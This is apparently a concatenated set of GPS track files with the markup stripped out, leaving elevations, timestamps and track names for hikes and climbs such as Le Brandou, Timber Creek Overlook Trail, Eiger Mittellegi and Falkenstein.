+2010-01-01T00:20:30Z
+
+
+114.0
+2010-01-01T00:20:58Z
+
+
+130.0
+2010-01-01T00:21:50Z
+
+
+132.0
+2010-01-01T00:22:17Z
+
+
+133.0
+2010-01-01T00:22:23Z
+
+
+138.0
+2010-01-01T00:22:40Z
+
+
+135.0
+2010-01-01T00:22:45Z
+
+
+135.0
+2010-01-01T00:22:53Z
+
+
+138.0
+2010-01-01T00:23:13Z
+
+
+129.0
+2010-01-01T00:23:31Z
+
+
+131.0
+2010-01-01T00:23:41Z
+
+
+143.0
+2010-01-01T00:23:53Z
+
+
+153.0
+2010-01-01T00:24:13Z
+
+
+151.0
+2010-01-01T00:24:38Z
+
+
+161.0
+2010-01-01T00:24:48Z
+
+
+165.0
+2010-01-01T00:25:28Z
+
+
+176.0
+2010-01-01T00:25:47Z
+
+
+198.0
+2010-01-01T00:26:29Z
+
+
+209.0
+2010-01-01T00:26:52Z
+
+
+229.0
+2010-01-01T00:27:17Z
+
+
+232.0
+2010-01-01T00:27:35Z
+
+
+277.0
+2010-01-01T00:28:22Z
+
+
+261.0
+2010-01-01T00:28:54Z
+
+
+273.0
+2010-01-01T00:29:01Z
+
+
+279.0
+2010-01-01T00:29:18Z
+
+
+257.0
+2010-01-01T00:30:55Z
+
+
+296.0
+2010-01-01T00:31:49Z
+
+
+277.0
+2010-01-01T00:32:44Z
+
+
+228.0
+2010-01-01T00:34:11Z
+
+
+257.0
+2010-01-01T00:34:36Z
+
+
+271.0
+2010-01-01T00:34:46Z
+
+
+276.0
+2010-01-01T00:34:55Z
+
+
+289.0
+2010-01-01T00:35:15Z
+
+
+303.0
+2010-01-01T00:35:41Z
+
+
+307.0
+2010-01-01T00:35:47Z
+ "
+"
+
+
+Le Brandou
+
+Monika Teusch - Community
+
+
+
+2016-04-17T17:17:41Z
+
+Le Brandou
+
+
+
+177.2014
+
+
+181.46751
+
+
+186.62779
+
+
+190.34917
+
+
+192.61247
+
+
+196.02367
+
+
+197.14293
+
+
+199.08238
+
+
+206.08592
+
+
+207.34496
+
+
+210.09374
+
+
+213.02599
+
+
+227.08934
+
+
+234.75133
+
+
+242.26195
+
+
+259.68462
+
+
+263.05772
+
+
+270.93614
+
+
+280.27513
+
+
+286.97752
+
+
+290.60857
+
+
+309.79137
+
+
+311.95049
+
+
+312.69408
+
+
+313.50127
+
+
+326.02672
+
+
+326.59044
+
+
+326.74748
+
+
+326.04112
+
+
+321.17162
+
+
+317.26683
+
+
+314.78905
+
+
+311.09764
+
+
+313.62547
+
+
+318.80162
+
+
+319.71733
+
+
+331.77977
+
+
+330.192
+
+
+314.03172
+
+
+323.16905
+
+
+308.49596
+
+
+298.46733
+
+
+296.49699
+
+
+290.39012
+
+
+290.6682
+
+
+288.94115
+
+
+305.82427
+
+
+310.01329
+
+
+307.94603
+
+
+327.34032
+
+
+336.74229
+
+
+351.11034
+
+
+362.26012
+
+
+361.26152
+
+
+360.54186
+
+
+355.21947
+
+
+357.6057
+
+
+365.78868
+
+
+364.50218
+
+
+362.1118
+
+
+361.76146
+
+
+378.91155
+
+
+385.10033
+
+
+396.60362
+
+
+399.72789
+
+
+414.92967
+
+
+420.12376
+
+
+422.47258
+
+
+434.94139
+
+
+431.61723
+
+
+437.19115
+
+
+436.18187
+
+
+443.65672
+
+
+443.09581
+
+
+453.13329
+
+
+454.95519
+
+
+464.44438
+
+
+486.5388
+
+
+503.78453
+
+
+505.60484
+
+
+507.02049
+
+
+520.77635
+
+
+520.07726
+
+
+492.72557
+
+
+475.13475
+
+
+468.66692
+
+
+466.11095
+
+
+464.10112
+ "
+"
+
+
+
+
+
+
+
+Linie
+
+
+
+749.6
+
+
+759.8
+
+
+756.9
+
+
+735.0
+
+
+733.6
+
+
+746.0
+
+
+748.4
+
+
+766.1
+
+
+769.1
+
+
+767.4
+
+
+766.1
+
+
+768.4
+
+
+784.8
+
+
+780.5
+
+
+784.0
+
+
+795.2
+
+
+796.7
+
+
+824.3
+
+
+812.8
+
+
+805.9
+
+
+807.0
+
+
+811.1
+
+
+827.0
+
+
+844.2
+
+
+847.4
+
+
+856.2
+
+
+879.6
+
+
+837.3
+
+
+841.3
+
+
+829.4
+
+
+836.4
+
+
+818.8
+
+
+820.9
+
+
+831.0
+
+
+823.7
+
+
+830.0
+
+
+851.7
+
+
+877.6
+
+
+884.5
+
+
+890.9
+
+
+881.3
+
+
+881.5
+
+
+858.7
+
+
+854.9
+
+
+808.8
+
+
+790.1
+
+
+740.4
+
+
+745.4
+ "
+"
+
+
+GPSies Track
+
+
+
+
+GPSies Track on GPSies.com
+2015-11-20T09:25:10Z
+
+GPSies Track on GPSies.com
+
+
+
+826.0
+2010-01-01T00:00:00Z
+
+
+857.0
+2010-01-01T00:01:37Z
+
+
+865.0
+2010-01-01T00:01:59Z
+
+
+867.0
+2010-01-01T00:03:21Z
+
+
+899.0
+2010-01-01T00:04:34Z
+
+
+920.0
+2010-01-01T00:05:32Z
+
+
+930.0
+2010-01-01T00:06:14Z
+
+
+938.0
+2010-01-01T00:06:38Z
+
+
+953.0
+2010-01-01T00:07:09Z
+
+
+969.0
+2010-01-01T00:08:07Z
+
+
+971.0
+2010-01-01T00:08:23Z
+
+
+980.0
+2010-01-01T00:08:50Z
+
+
+997.0
+2010-01-01T00:09:28Z
+
+
+1007.0
+2010-01-01T00:09:54Z
+
+
+1008.0
+2010-01-01T00:10:08Z
+
+
+1034.0
+2010-01-01T00:11:56Z
+
+
+1038.0
+2010-01-01T00:13:01Z
+
+
+1053.0
+2010-01-01T00:13:54Z
+
+
+1065.0
+2010-01-01T00:14:20Z
+
+
+1070.0
+2010-01-01T00:14:41Z
+
+
+1119.0
+2010-01-01T00:16:22Z
+
+
+1133.0
+2010-01-01T00:17:00Z
+
+
+1137.0
+2010-01-01T00:17:09Z
+
+
+1157.0
+2010-01-01T00:18:07Z
+
+
+1154.0
+2010-01-01T00:19:19Z
+
+
+1172.0
+2010-01-01T00:20:12Z
+
+
+1188.0
+2010-01-01T00:21:03Z
+
+
+1202.0
+2010-01-01T00:21:53Z
+
+
+1208.0
+2010-01-01T00:22:45Z
+
+
+1242.0
+2010-01-01T00:23:41Z
+
+
+1248.0
+2010-01-01T00:24:13Z
+
+
+1264.0
+2010-01-01T00:25:51Z
+
+
+1264.0
+2010-01-01T00:26:49Z
+
+
+1270.0
+2010-01-01T00:27:18Z
+
+
+1274.0
+2010-01-01T00:28:00Z
+
+
+1245.0
+2010-01-01T00:29:58Z
+
+
+1251.0
+2010-01-01T00:30:49Z
+
+
+1331.0
+2010-01-01T00:32:31Z
+
+
+1328.0
+2010-01-01T00:34:11Z
+
+
+1305.0
+2010-01-01T00:34:44Z
+
+
+1289.0
+2010-01-01T00:34:59Z
+
+
+1283.0
+2010-01-01T00:35:54Z
+
+
+1256.0
+2010-01-01T00:37:28Z
+
+
+1252.0
+2010-01-01T00:38:16Z
+
+
+1245.0
+2010-01-01T00:39:10Z
+
+
+1249.0
+2010-01-01T00:39:45Z
+
+
+1251.0
+2010-01-01T00:40:41Z
+
+
+1218.0
+2010-01-01T00:41:19Z
+
+
+1203.0
+2010-01-01T00:42:01Z
+
+
+1152.0
+2010-01-01T00:43:14Z
+
+
+1119.0
+2010-01-01T00:44:00Z
+
+
+1083.0
+2010-01-01T00:44:38Z
+
+
+1050.0
+2010-01-01T00:45:46Z
+
+
+1026.0
+2010-01-01T00:46:29Z
+
+
+1001.0
+2010-01-01T00:46:46Z
+
+
+972.0
+2010-01-01T00:48:27Z
+
+
+965.0
+2010-01-01T00:48:54Z
+
+
+972.0
+2010-01-01T00:49:16Z
+
+
+970.0
+2010-01-01T00:49:49Z
+
+
+973.0
+2010-01-01T00:50:21Z
+
+
+975.0
+2010-01-01T00:50:41Z
+
+
+950.0
+2010-01-01T00:51:49Z
+
+
+947.0
+2010-01-01T00:52:10Z
+
+
+938.0
+2010-01-01T00:52:34Z
+
+
+930.0
+2010-01-01T00:53:03Z
+ "
+"
+
+
+
+
+
+
+2016-07-25T21:09:58Z
+
+
+Timber Creek Overlook Trail
+
+
+
+1898.0
+2016-07-25T21:09:58Z
+
+
+
+
+0.000000
+
+1903.0
+2016-07-25T21:10:30Z
+
+
+
+
+6.192211
+
+1907.0
+2016-07-25T21:12:32Z
+
+
+
+
+1.160248
+
+1906.0
+2016-07-25T21:13:44Z
+
+
+
+
+9.309174
+
+1898.0
+2016-07-25T21:15:08Z
+
+
+
+
+10.514221
+
+1895.0
+2016-07-25T21:15:34Z
+
+
+
+
+11.433136
+
+1896.0
+2016-07-25T21:16:07Z
+
+
+
+
+5.466370
+
+1896.0
+2016-07-25T21:17:30Z
+
+
+
+
+4.154602
+
+1911.0
+2016-07-25T21:20:21Z
+
+
+
+
+7.365967
+
+1919.0
+2016-07-25T21:21:17Z
+
+
+
+
+5.824463
+
+1920.0
+2016-07-25T21:22:44Z
+
+
+
+
+1.758850
+
+1918.0
+2016-07-25T21:23:59Z
+
+
+
+
+1.777771
+
+1920.0
+2016-07-25T21:25:08Z
+
+
+
+
+6.255005
+
+1920.0
+2016-07-25T21:27:16Z
+
+
+
+
+12.956909
+
+1898.0
+2016-07-25T21:31:26Z
+
+
+
+
+0.236816
+
+1909.0
+2016-07-25T21:36:36Z
+
+
+
+
+1.299438
+
+1907.0
+2016-07-25T21:39:25Z
+
+
+
+
+3.842896
+
+1902.0
+2016-07-25T21:40:10Z
+
+
+
+
+1.467651
+
+1906.0
+2016-07-25T21:42:14Z
+
+
+
+
+2.054443
+
+1920.0
+2016-07-25T21:50:28Z
+
+
+
+
+4.399902
+
+1917.0
+2016-07-25T21:55:36Z
+
+
+
+
+6.736328
+
+1919.0
+2016-07-25T21:56:15Z
+
+
+
+
+3.302979
+
+1907.0
+2016-07-25T21:58:04Z
+
+
+
+
+3.242065
+
+1901.0
+2016-07-25T21:59:02Z
+
+
+
+
+10.868164
+
+1897.0
+2016-07-25T22:00:57Z
+
+
+
+
+6.354980
+
+1896.0
+2016-07-25T22:01:37Z
+
+
+
+
+9.276245
+
+1899.0
+2016-07-25T22:02:03Z
+
+
+
+
+1.129150
+
+1905.0
+2016-07-25T22:03:23Z
+
+
+
+
+2.783203
+
+1910.0
+2016-07-25T22:06:43Z
+
+
+
+
+3.253906
+
+1907.0
+2016-07-25T22:11:23Z
+
+
+
+
+6.170654
+
+1906.0
+2016-07-25T22:11:34Z
+
+
+
+
+7.888672
+
+1906.0
+2016-07-25T22:12:44Z
+
+
+
+
+6.825684
+
+1900.0
+2016-07-25T22:13:40Z
+
+
+
+
+0.873779 "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-01-17T11:53:49Z
+
+!!2016-01-17 10:50:57
+
+
+
+
+
+1310.41
+2016-01-17T07:00:25Z
+
+
+1315.7
+2016-01-17T07:03:12Z
+
+
+1317.14
+2016-01-17T07:03:25Z
+
+
+1328.68
+2016-01-17T07:05:15Z
+
+
+1340.22
+2016-01-17T07:06:53Z
+
+
+1349.35
+2016-01-17T07:08:16Z
+
+
+1363.29
+2016-01-17T07:10:13Z
+
+
+1376.75
+2016-01-17T07:11:53Z
+
+
+1397.41
+2016-01-17T07:14:42Z
+
+
+1412.79
+2016-01-17T07:17:47Z
+
+
+1425.77
+2016-01-17T07:20:29Z
+
+
+1446.44
+2016-01-17T07:22:01Z
+
+
+1458.46
+2016-01-17T07:23:32Z
+
+
+1464.23
+2016-01-17T07:26:12Z
+
+
+1507.97
+2016-01-17T07:33:47Z
+
+
+1526.71
+2016-01-17T07:36:40Z
+
+
+1541.13
+2016-01-17T07:38:19Z
+
+
+1562.76
+2016-01-17T07:40:41Z
+
+
+1584.87
+2016-01-17T07:43:13Z
+
+
+1610.35
+2016-01-17T07:50:58Z
+
+
+1633.42
+2016-01-17T07:54:15Z
+
+
+1654.57
+2016-01-17T07:59:27Z
+
+
+1674.75
+2016-01-17T08:02:00Z
+
+
+1687.73
+2016-01-17T08:03:40Z
+
+
+1698.31
+2016-01-17T08:05:08Z
+
+
+1727.63
+2016-01-17T08:09:02Z
+
+
+1743.97
+2016-01-17T08:11:34Z
+
+
+1754.06
+2016-01-17T08:14:22Z
+
+
+1780.5
+2016-01-17T08:21:39Z
+
+
+1785.79
+2016-01-17T08:23:25Z
+
+
+1788.19
+2016-01-17T08:24:28Z
+
+
+1780.98
+2016-01-17T08:26:19Z
+
+
+1774.73
+2016-01-17T08:29:55Z
+
+
+1771.85
+2016-01-17T08:31:25Z
+
+
+1770.89
+2016-01-17T08:32:55Z
+
+
+1765.12
+2016-01-17T08:35:14Z
+
+
+1762.23
+2016-01-17T08:37:36Z
+
+
+1766.56
+2016-01-17T08:41:42Z
+
+
+1772.81
+2016-01-17T08:44:34Z
+
+
+1784.82
+2016-01-17T08:46:28Z
+
+
+1809.34
+2016-01-17T08:51:49Z
+
+
+1835.29
+2016-01-17T08:56:35Z
+
+
+1851.16
+2016-01-17T08:59:31Z
+
+
+1853.08
+2016-01-17T09:00:47Z
+
+
+1852.12
+2016-01-17T09:03:07Z
+
+
+1870.86
+2016-01-17T09:11:19Z
+
+
+1884.32
+2016-01-17T09:14:09Z
+
+
+1894.42
+2016-01-17T09:16:41Z
+
+
+1895.38
+2016-01-17T09:18:58Z
+
+
+1908.83
+2016-01-17T09:23:42Z
+
+
+1931.91
+2016-01-17T09:29:04Z
+
+
+1961.23
+2016-01-17T09:33:49Z
+
+
+1984.78
+2016-01-17T09:39:20Z
+
+
+2020.83
+2016-01-17T09:46:02Z
+
+
+2015.06
+2016-01-17T09:46:40Z
+
+
+2012.18
+2016-01-17T09:50:56Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-09-26T06:08:25Z
+
+
+2016-09-25-01
+
+
+
+
+
+
+1459.6
+2016-09-25T07:14:49Z
+
+
+1458.9
+2016-09-25T07:16:46Z
+
+
+1474.5
+2016-09-25T07:17:46Z
+
+
+1473.9
+2016-09-25T07:18:29Z
+
+
+1461.0
+2016-09-25T07:19:43Z
+
+
+1468.6
+2016-09-25T07:20:53Z
+
+
+1470.2
+2016-09-25T07:22:32Z
+
+
+1476.8
+2016-09-25T07:23:21Z
+
+
+1488.8
+2016-09-25T07:24:18Z
+
+
+1515.8
+2016-09-25T07:26:13Z
+
+
+1542.4
+2016-09-25T07:29:05Z
+
+
+1546.9
+2016-09-25T07:31:58Z
+
+
+1535.6
+2016-09-25T07:33:21Z
+
+
+1549.7
+2016-09-25T07:34:47Z
+
+
+1566.5
+2016-09-25T07:37:13Z
+
+
+1576.2
+2016-09-25T07:39:18Z
+
+
+1579.7
+2016-09-25T07:40:03Z
+
+
+1588.5
+2016-09-25T07:40:52Z
+
+
+1617.0
+2016-09-25T07:43:21Z
+
+
+1629.8
+2016-09-25T07:44:24Z
+
+
+1637.5
+2016-09-25T07:45:12Z
+
+
+1638.8
+2016-09-25T07:45:33Z
+
+
+1647.3
+2016-09-25T07:46:37Z
+
+
+1655.8
+2016-09-25T07:47:27Z
+
+
+1665.1
+2016-09-25T07:51:39Z
+
+
+1674.9
+2016-09-25T07:52:32Z
+
+
+1687.5
+2016-09-25T07:54:20Z
+
+
+1647.1
+2016-09-25T07:56:21Z
+
+
+1644.1
+2016-09-25T07:57:04Z
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-06-13T14:09:44Z
+
+
+Fricktaler Chriesiwäg
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin Connect
+2015-07-04T11:12:34Z
+
+Eiger - Mittellegi
+Tb conditions sur l'arête jusqu'à 3900, délicates au dessus, franchement dangereuses dans la descente en face W --> héliportage à 3560m.
+
+
+
+2015-07-04T11:12:34Z
+
+
+2015-07-04T11:16:00Z
+
+
+2015-07-04T11:19:21Z
+
+
+2015-07-04T11:22:50Z
+
+
+2015-07-04T11:25:14Z
+
+
+2015-07-04T11:29:51Z
+
+
+2015-07-04T11:33:14Z
+
+
+2015-07-04T11:44:52Z
+
+
+2015-07-04T11:55:10Z
+
+
+2015-07-04T12:05:12Z
+
+
+2015-07-04T12:08:24Z
+
+
+2015-07-04T12:18:47Z
+
+
+2015-07-04T12:19:45Z
+
+
+2015-07-04T12:31:06Z
+
+
+2015-07-04T12:35:14Z
+
+
+2015-07-04T12:38:55Z
+
+
+2015-07-04T12:42:04Z
+
+
+2015-07-04T12:49:34Z
+
+
+2015-07-04T12:54:04Z
+
+
+2015-07-04T12:57:47Z
+
+
+2015-07-05T02:55:01Z
+
+
+2015-07-05T03:17:12Z
+
+
+2015-07-05T03:20:07Z
+
+
+2015-07-05T03:21:32Z
+
+
+2015-07-05T03:39:04Z
+
+
+2015-07-05T04:08:15Z
+
+
+2015-07-05T04:13:22Z
+
+
+2015-07-05T04:14:08Z
+
+
+2015-07-05T04:17:49Z
+
+
+2015-07-05T04:33:39Z
+
+
+2015-07-05T05:16:32Z
+
+
+2015-07-05T05:31:55Z
+
+
+2015-07-05T05:37:20Z
+
+
+2015-07-05T05:50:15Z
+
+
+2015-07-05T05:52:06Z
+
+
+2015-07-05T06:00:10Z
+
+
+2015-07-05T06:55:04Z
+
+
+2015-07-05T07:08:33Z
+
+
+2015-07-05T07:10:28Z
+
+
+2015-07-05T07:24:45Z
+
+
+2015-07-05T07:31:37Z
+
+
+2015-07-05T07:39:45Z
+
+
+2015-07-05T07:55:39Z
+
+
+2015-07-05T08:00:13Z
+
+
+2015-07-05T08:00:24Z
+
+
+2015-07-05T08:00:25Z
+
+
+2015-07-05T08:00:32Z
+
+
+2015-07-05T08:19:57Z
+
+
+2015-07-05T08:39:15Z
+
+
+2015-07-05T09:06:07Z
+
+
+2015-07-05T09:11:03Z
+
+
+2015-07-05T09:23:51Z
+
+
+2015-07-05T09:26:01Z
+
+
+2015-07-05T09:41:59Z
+
+
+2015-07-05T10:11:40Z
+
+
+2015-07-05T10:15:43Z
+
+
+2015-07-05T10:20:57Z
+
+
+2015-07-05T11:02:25Z
+
+
+2015-07-05T11:03:41Z
+
+
+2015-07-05T11:18:38Z
+
+
+2015-07-05T11:19:02Z
+
+
+2015-07-05T11:19:34Z
+
+
+2015-07-05T11:20:07Z
+
+
+2015-07-05T11:20:46Z
+
+
+2015-07-05T11:21:09Z
+
+
+2015-07-05T11:21:23Z
+
+
+2015-07-05T11:21:48Z
+
+
+2015-07-05T11:57:06Z
+
+
+2015-07-05T12:18:22Z
+
+
+2015-07-05T12:20:12Z
+
+
+2015-07-05T12:21:06Z
+
+
+2015-07-05T12:21:53Z
+
+
+2015-07-05T12:22:50Z
+
+
+2015-07-05T12:24:54Z
+
+
+2015-07-05T12:28:05Z
+
+
+2015-07-05T12:33:12Z
+
+
+2015-07-05T12:36:44Z
+
+
+2015-07-05T12:40:23Z
+
+
+2015-07-05T12:53:10Z
+
+
+2015-07-05T12:53:35Z
+
+
+2015-07-05T12:55:34Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+BERGTOUR Falkenstein 1
+
+Thomas Mitterer
+
+
+
+2017-08-29T20:01:36Z
+
+
+
+
+
+0.0
+2017-08-25T07:58:01Z
+
+4
+
+0.0
+2017-08-25T07:58:48Z
+
+4
+
+821.0
+2017-08-25T07:59:05Z
+
+5
+
+820.0
+2017-08-25T07:59:18Z
+
+5
+
+816.0
+2017-08-25T08:00:25Z
+
+6
+
+815.0
+2017-08-25T08:01:33Z
+
+6
+
+823.0
+2017-08-25T08:02:39Z
+
+6
+
+825.0
+2017-08-25T08:03:11Z
+
+6
+
+827.0
+2017-08-25T08:03:44Z
+
+6
+
+829.0
+2017-08-25T08:05:26Z
+
+7
+
+843.0
+2017-08-25T08:08:14Z
+
+8
+
+847.0
+2017-08-25T08:11:23Z
+
+8
+
+848.0
+2017-08-25T08:12:06Z
+
+7
+
+855.0
+2017-08-25T08:13:08Z
+
+8
+
+897.0
+2017-08-25T08:16:43Z
+
+8
+
+908.0
+2017-08-25T08:19:38Z
+
+8
+
+909.0
+2017-08-25T08:25:03Z
+
+8
+
+925.0
+2017-08-25T08:28:09Z
+
+8
+
+974.0
+2017-08-25T08:39:45Z
+
+8
+
+1036.0
+2017-08-25T08:57:03Z
+
+9
+
+1035.0
+2017-08-25T08:59:32Z
+
+9
+
+1081.0
+2017-08-25T09:05:55Z
+
+8
+
+1084.0
+2017-08-25T09:09:40Z
+
+9
+
+1102.0
+2017-08-25T09:11:35Z
+
+8
+
+1107.0
+2017-08-25T09:11:58Z
+
+9
+
+1109.0
+2017-08-25T09:12:38Z
+
+9
+
+1102.0
+2017-08-25T09:13:05Z
+
+9
+
+1092.0
+2017-08-25T09:13:46Z
+
+9
+
+1116.0
+2017-08-25T09:16:11Z
+
+9
+
+1090.0
+2017-08-25T09:20:31Z
+
+9
+
+1102.0
+2017-08-25T09:22:07Z
+
+10
+
+1083.0
+2017-08-25T09:23:25Z
+
+10
+
+1080.0
+2017-08-25T09:24:27Z
+
+10
+
+1080.0
+2017-08-25T09:25:41Z
+
+10 "
+"
+
+
+Rovine del Castelliere
+
+
+
+
+
+
+
+
+
+253.7
+
+
+254.20000625898817
+
+
+255.4000247949861
+
+
+269.80013215484894
+
+
+281.7998885813871
+
+
+287.60004478909093
+
+
+325.40002042568625
+
+
+335.70009937339313
+
+
+345.8
+
+
+383.2
+
+
+406.1000403292819
+
+
+421.9999580973406
+
+
+445.499959993864
+
+
+450.1998895268991
+
+
+458.10002471586347
+
+
+460.50012957251397
+
+
+495.2999159485697
+
+
+510.1
+
+
+516.2000601492776
+
+
+522.7999190209237
+
+
+527.0999220592705
+
+
+531.6999637703068
+
+
+535.1999590821633
+
+
+530.79993455529
+
+
+522.4999744518332
+
+
+517.399945306463
+
+
+510.5
+
+
+492.099645956834
+
+
+458.49997931656577
+
+
+462.2
+
+
+454.29998600971254
+
+
+427.1
+
+
+424.1
+
+
+421.9000290952781
+
+
+416.1000305545696
+
+
+394.6999582722566
+
+
+378.59996207197145
+
+
+359.499870923805
+
+
+329.0
+
+
+299.9
+
+
+294.9
+
+
+292.20002664898135
+
+
+275.999999927804
+
+
+266.2
+
+
+261.69989384429033
+
+
+259.20007256845247
+
+
+261.2999881875691
+
+
+259.19999339844577
+
+
+256.5
+
+
+252.20003808073108
+
+
+257.00004655445997
+
+
+262.6
+
+
+263.59998502591856
+
+
+263.90002861324166
+
+
+265.4999828101775
+
+
+256.9000011738655
+
+
+256.1
+
+
+255.39998836494073
+
+
+254.50000270693764
+
+
+248.59994909912413
+ "
+"
+
+
+Tourenplanung am 19. Juli 2016
+
+TemporaryUserGroup
+
+
+
+2016-07-19T18:24:34Z
+
+Tourenplanung am 19. Juli 2016
+
+
+
+283.73221
+
+
+289.97216
+
+
+297.55826
+
+
+322.02305
+
+
+327.06739
+
+
+357.97557
+
+
+404.39024
+
+
+473.43194
+
+
+481.13997
+
+
+454.92361
+
+
+438.7275
+
+
+431.85537
+
+
+423.68928
+
+
+420.33158
+
+
+416.895
+
+
+408.03148
+
+
+394.38413
+
+
+382.65311
+
+
+372.15278
+
+
+361.04679
+
+
+353.61969
+
+
+349.86134
+
+
+346.05221
+
+
+334.64498
+
+
+336.8725
+
+
+329.74872
+
+
+319.66848
+
+
+309.3041
+
+
+306.12677
+
+
+301.97469
+
+
+302.30244
+
+
+308.14771
+
+
+301.98249
+
+
+297.01624
+
+
+287.50834
+
+
+284.92911
+ "
+"
+
+
+Col de Fontbelle zur Crete de Geruen
+
+Ekkehard Domning
+
+
+
+2016-02-02T18:19:31Z
+
+Col de Fontbelle zur Crete de Geruen
+
+
+
+1314.55712
+
+
+1313.11639
+
+
+1315.14584
+
+
+1315.04237
+
+
+1321.46294
+
+
+1325.81608
+
+
+1331.23306
+
+
+1321.19768
+
+
+1327.12292
+
+
+1335.00086
+
+
+1339.89136
+
+
+1340.26263
+
+
+1345.41376
+
+
+1359.24854
+
+
+1354.21485
+
+
+1361.50425
+
+
+1364.78016
+
+
+1380.92504
+
+
+1391.6178
+
+
+1411.20698
+
+
+1409.5988
+
+
+1416.77261
+
+
+1424.15466
+
+
+1442.09397
+
+
+1459.98824
+
+
+1463.51423
+
+
+1470.21478
+
+
+1465.37591
+
+
+1467.79246
+
+
+1484.8776
+
+
+1502.79339
+
+
+1520.31508
+
+
+1520.79667
+
+
+1532.62933
+
+
+1548.89814
+
+
+1601.01995
+
+
+1632.50198
+
+
+1639.23807
+
+
+1655.53064
+
+
+1670.03521
+
+
+1670.99932
+
+
+1707.62885
+
+
+1708.22472
+
+
+1718.88572
+
+
+1726.33942
+
+
+1733.43821
+
+
+1730.31248
+ "
+"
+
+
+KOMPASS Digital Map Track
+
+
+
+
+2016-10-26T12:07:18Z
+
+
+Heulantsch
+
+
+
+
+
+
+1179.23
+1970-01-01T00:00:00Z
+
+
+1179.83
+1970-01-01T00:00:00Z
+
+
+1179.0
+1970-01-01T00:00:00Z
+
+
+1179.29
+1970-01-01T00:00:00Z
+
+
+1180.0
+1970-01-01T00:00:00Z
+
+
+1180.05
+1970-01-01T00:00:00Z
+
+
+1180.46
+1970-01-01T00:00:00Z
+
+
+1180.13
+1970-01-01T00:00:00Z
+
+
+1187.4
+1970-01-01T00:00:00Z
+
+
+1198.46
+1970-01-01T00:00:00Z
+
+
+1208.92
+1970-01-01T00:00:00Z
+
+
+1227.4
+1970-01-01T00:00:00Z
+
+
+1231.82
+1970-01-01T00:00:00Z
+
+
+1251.95
+1970-01-01T00:00:00Z
+
+
+1281.72
+1970-01-01T00:00:00Z
+
+
+1301.71
+1970-01-01T00:00:00Z
+
+
+1354.38
+1970-01-01T00:00:00Z
+
+
+1380.71
+1970-01-01T00:00:00Z
+
+
+1417.4
+1970-01-01T00:00:00Z
+
+
+1439.89
+1970-01-01T00:00:00Z
+
+
+1443.99
+1970-01-01T00:00:00Z
+
+
+1444.08
+1970-01-01T00:00:00Z
+
+
+1440.64
+1970-01-01T00:00:00Z
+
+
+1441.14
+1970-01-01T00:00:00Z
+
+
+1458.64
+1970-01-01T00:00:00Z
+
+
+1447.88
+1970-01-01T00:00:00Z
+
+
+1441.05
+1970-01-01T00:00:00Z
+
+
+1445.15
+1970-01-01T00:00:00Z
+
+
+1442.34
+1970-01-01T00:00:00Z
+
+
+1426.36
+1970-01-01T00:00:00Z
+
+
+1391.97
+1970-01-01T00:00:00Z
+
+
+1322.69
+1970-01-01T00:00:00Z
+
+
+1294.93
+1970-01-01T00:00:00Z
+
+
+1272.75
+1970-01-01T00:00:00Z
+
+
+1253.04
+1970-01-01T00:00:00Z
+
+
+1240.48
+1970-01-01T00:00:00Z
+
+
+1226.75
+1970-01-01T00:00:00Z
+
+
+1220.04
+1970-01-01T00:00:00Z
+
+
+1213.6
+1970-01-01T00:00:00Z
+
+
+1205.67
+1970-01-01T00:00:00Z
+
+
+1197.87
+1970-01-01T00:00:00Z
+
+
+1197.32
+1970-01-01T00:00:00Z
+
+
+1184.19
+1970-01-01T00:00:00Z
+
+
+1179.89
+1970-01-01T00:00:00Z
+
+
+1179.03
+1970-01-01T00:00:00Z
+
+
+1180.0
+1970-01-01T00:00:00Z
+
+
+1180.0
+1970-01-01T00:00:00Z
+
+
+1180.36
+1970-01-01T00:00:00Z
+
+
+1179.0
+1970-01-01T00:00:00Z
+
+
+1179.56
+1970-01-01T00:00:00Z
+
+
+1179.08
+1970-01-01T00:00:00Z
+
+
+1179.97
+1970-01-01T00:00:00Z
+ "
+"
+
+
+Route created on plotaroute.com
+
+
+
+
+
+Unnamed Route
+
+
+
+-32768.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
+
+
+0.0
